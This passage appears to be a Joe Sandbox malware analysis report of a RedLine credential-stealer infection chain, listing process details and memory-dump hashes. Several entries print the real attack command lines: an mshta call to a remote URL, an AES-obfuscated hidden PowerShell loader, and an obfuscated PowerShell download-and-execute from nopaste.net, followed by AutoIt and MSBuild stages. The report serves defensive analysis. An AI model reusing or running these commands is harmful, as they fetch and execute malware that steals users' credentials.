Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:10:04
Start date:	17/12/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
Imagebase:	0x7ff6f9f90000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	02:10:07
Start date:	17/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	02:10:08
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5E342E8B3007240FE11C37187542FAF44694BA243E75720F63DAC402F92D531741366BDB6322CF081331A805D7C393B10FE6A6618BA7FCC4E44DC5C3A47A515A78FD0681299AE510D773C4AE75FA31612D3D761D8F51CB984EE9FE20883C2574541CB70B38F08EBC3023844993DE3B2CEAA99C7009E715AEA59A5FD63088DABF3232B33A46C35A72875E7544BE0C19F8CB92CF266FDFA7ADB7450BB6B1BB5764CACC8A0D627027BDE338F15A2F8ECC5EBF9EE1C3D0F79E37CC3411BDB4D526BA177D7FF4D1ED20E9894CC6E2648DC8FC2D093F6902B74DB4734ED06D43D0FB6A059279B864CFB87D4BB1DEBA3231227EB853545F0719A82018CCF19D9DC57F3A1C53666C941C5B457CA531546D3B800353A592D337CEEBED25824ED14F551081B08B6BA4A2059BAB42CC76D64E04A6DA0B3F10A753DF0A78DF9ED54DF3ADA3FB5B2265878E42BD705E435684134A35F96363B352F4BC04C266C99E75BED507D7C90A66E95C9D579520DB850EBCA134E512948BA775D035F895CB164ECF18DE81BE0FB9A6FB1FE1420F36FEDE040D9AB9343D928AD528763A51983374934ECD28DFB3D1957EFD625A9446717760CC7DC939BF26E555C8F22289F0DBC19789B4959F856A76B0EB6B71198B98EAE2103527702F776A6E63EDC34DA4615FB6324C083EBA43C9F3D9194E7F3EB6E3690044935E9E945A043E06339A90CD5C082951401D1A63BA39BF680652F8989BF4CD69559249DC7898F06521B5D07DBF12FFD6CF71EFA8681D6FDAEDAD1262BED7933FACC9C1B8DE78D5DAB90DD2018854BA9AF7F4BD8927EC8B7F9C0774803B76F3B90447B63425D5B07CC834F49BD8D5DD26240C7A0953A10862584B0F1E4827E3C946EFF41E8284A4E4978A44245F4D8379F5A8105821871172D50BA89834B46C518229D1E0F0E4E77');$nJpn=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CgMQB('484650636D48754D45634B49746F565A')),[byte[]]::new(16)).TransformFinalBlock($QBRr,0,$QBRr.Length)); & $nJpn.Substring(0,3) $nJpn.Substring(273)
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:10:08
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	02:10:09
Start date:	17/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('Nect',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Cmt'}).Name).Invoke((Get-ChildItem Variable:\Eonte).Value.InvokeCommand.(((Get-ChildItem Variable:\Eonte).Value.InvokeCommand\|Get-Member\|Where-Object{(Get-Variable _).Value.Name-ilike'Gome'}).Name).Invoke('In-Exion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value\|Get-Member)\|Where-Object{(Get-Variable _).Value.Name-ilike'nl*a'}).Name).Invoke((GCI Variable:\s).Value)\|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	02:10:09
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	02:10:20
Start date:	17/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"
Imagebase:	0x7ff702560000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	02:10:21
Start date:	17/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	04:08:18
Start date:	17/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1680,i,7793574155390070799,18078941807343672542,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6c3ff0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	04:08:33
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\27589682\updater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\27589682\updater.exe" C:\Users\user~1\AppData\Local\Temp\27589682\OWoDjWrI.dll
Imagebase:	0xbb0000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000003.1700128947.0000000005BA4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000003.1699884150.0000000005E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001B.00000002.1705438253.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:08:40
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x5c0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	04:08:51
Start date:	17/12/2024
Path:	C:\faggbgb\AutoIt3.exe
Wow64 process (32bit):	true
Commandline:	"C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Imagebase:	0x340000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.1869173897.0000000005C34000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000002.1872119594.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.1868490019.0000000005F20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:08:57
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xad0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.1869837031.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:08:59
Start date:	17/12/2024
Path:	C:\faggbgb\AutoIt3.exe
Wow64 process (32bit):	true
Commandline:	"C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
Imagebase:	0x340000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000002.1950892133.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000003.1945564458.0000000005DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000003.1946324487.0000000005B04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	04:09:05
Start date:	17/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x7ff644d60000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFAAC4E33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1313339774.00007FFAAC4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac4e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: cc80630ebb9106a8656afb7d570ccca3898bd47094d13d3fb293d1de69c1342f
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: B001A77010CB0C8FD744EF0CE051AA5B3E0FB85324F10056DE58AC3661DB32E882CB45

Analysis Process: mshta.exePID: 7444, Parent PID: 7348COMMON

Executed Functions

Function 000002743AB61102 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2573285759.000002743AB60000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743AB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743ab60000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d820a4ba808ade74faa9d283f5fca40b1eaa3e8d0bf97bb200a66686433dc3
Instruction ID: 60eabe455f201651c5b5cd15cf9c011bea269ae481f0979e6848dec500ea30c7
Opcode Fuzzy Hash: 62d820a4ba808ade74faa9d283f5fca40b1eaa3e8d0bf97bb200a66686433dc3
Instruction Fuzzy Hash: 9141D111B5DB8C4FFB99A6AC685C7313AC1DBAA340F5D01DBE98CCB1F2D6108C848395

Function 000002743AB6220D Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2573285759.000002743AB60000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743AB60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743ab60000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78ddc86d654bde68a147c3e67a2ff3c340878a4d53a0ce9962dd01c8ec06fdf
Instruction ID: 19912f581d1970eb42e87cd85ff0c127f435a8190089595fd136f79da13a3647
Opcode Fuzzy Hash: f78ddc86d654bde68a147c3e67a2ff3c340878a4d53a0ce9962dd01c8ec06fdf
Instruction Fuzzy Hash: 5A116161F5DB880BF7AE6578543D3342AC1D7A9341F6A00EBA68EC72F3E9188C858255

Function 000002743A490FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2572132040.000002743A490000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743a490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: ee425f6f1fd87469416c104143e5831a37e4a8b07aa573e9f41b7fc748b48f24
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 299002055D940655E414E1910C4925C504063D8250FE444C5941ED0148D68D03A65156

Function 000002743A490F81 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2572132040.000002743A490000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743a490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: ee425f6f1fd87469416c104143e5831a37e4a8b07aa573e9f41b7fc748b48f24
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 299002055D940655E414E1910C4925C504063D8250FE444C5941ED0148D68D03A65156

Function 000002743A490F89 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2572132040.000002743A490000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743a490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: ee425f6f1fd87469416c104143e5831a37e4a8b07aa573e9f41b7fc748b48f24
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 299002055D940655E414E1910C4925C504063D8250FE444C5941ED0148D68D03A65156

Function 000002743A490F99 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2572132040.000002743A490000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743a490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: ee425f6f1fd87469416c104143e5831a37e4a8b07aa573e9f41b7fc748b48f24
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 299002055D940655E414E1910C4925C504063D8250FE444C5941ED0148D68D03A65156

Function 000002743A490FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2572132040.000002743A490000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002743A490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2743a490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: ee425f6f1fd87469416c104143e5831a37e4a8b07aa573e9f41b7fc748b48f24
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 299002055D940655E414E1910C4925C504063D8250FE444C5941ED0148D68D03A65156

Analysis Process: powershell.exePID: 7720, Parent PID: 7444COMMON

Executed Functions

Function 00007FFAAB523DED Relevance: 2.9, Strings: 2, Instructions: 361COMMON

Download Yara Rule

Strings

r63, xrefs: 00007FFAAB523F4F
r63, xrefs: 00007FFAAB523F0A

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID: r63$r63
API String ID: 0-2640113253
Opcode ID: a3abd20ae2f939f68b3b237529d07b6b372b6cf1def8f82661ddb691df74020f
Instruction ID: 1d282b40bd5daf722c045d03f7d19b4a9f467994316fe2b04b8a0d19599316f9
Opcode Fuzzy Hash: a3abd20ae2f939f68b3b237529d07b6b372b6cf1def8f82661ddb691df74020f
Instruction Fuzzy Hash: E9A1397290FB8A8FE7599728E8555753BE5FF86250F0441FBE04EC70A3D929AC4A83C1

Function 00007FFAAB523EE7 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

r63, xrefs: 00007FFAAB523F4F
r63, xrefs: 00007FFAAB523F0A

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID: r63$r63
API String ID: 0-2640113253
Opcode ID: 1ae1e470ef86b59ff5f814ada20bdf174931921eb74af779bced667fe31ca16c
Instruction ID: 4cc1f16abb49e19598618226415640149420f931b1c4ba7f3544d5c50b94e9b0
Opcode Fuzzy Hash: 1ae1e470ef86b59ff5f814ada20bdf174931921eb74af779bced667fe31ca16c
Instruction Fuzzy Hash: 8F11D363D1F9478FE2A89318F49217866E5FF46290F88C2BAE44FC35A3DD2C6C0945C1

Function 00007FFAAB526995 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc85a65556354c37253d74b4b6c5b9e79b30d5faab994737535d2ff6dd1f496
Instruction ID: 37707c5a09a4a6de931df556b187f02c83e361d535e46386bd00447f40f23c3b
Opcode Fuzzy Hash: 1dc85a65556354c37253d74b4b6c5b9e79b30d5faab994737535d2ff6dd1f496
Instruction Fuzzy Hash: 02D15A7290FACB8FE765AB6888555B97BD5EF22350B1840FED44EC70A3DA189809C3D1

Function 00007FFAAB523A7D Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7091135b90dbde912750f9e31ddcedc31483d24f62351e5beb3a8ee927514f1
Instruction ID: 267ebddcbb226e75794a56f657c7eaaf66c1453415d89008f441f15923b6fb3b
Opcode Fuzzy Hash: b7091135b90dbde912750f9e31ddcedc31483d24f62351e5beb3a8ee927514f1
Instruction Fuzzy Hash: AEC14962A0FBCB4FE7A6972888551B57BD5EF57290B1841FBD04EC71A3DC289C0A83D1

Function 00007FFAAB523B4A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c50416dffac8927c31a0851f0bc2546c94882f0740f5d903e2d2b599aa621e6a
Instruction ID: 9f373ada0480fafd838fdec96ca4d5b57e74fd9afc46a193220eb7dabd41dcf6
Opcode Fuzzy Hash: c50416dffac8927c31a0851f0bc2546c94882f0740f5d903e2d2b599aa621e6a
Instruction Fuzzy Hash: F441B657A0FACB8FF7A99728885517869C6FF96291B5840B9D54FC32E3DC2C980842C1

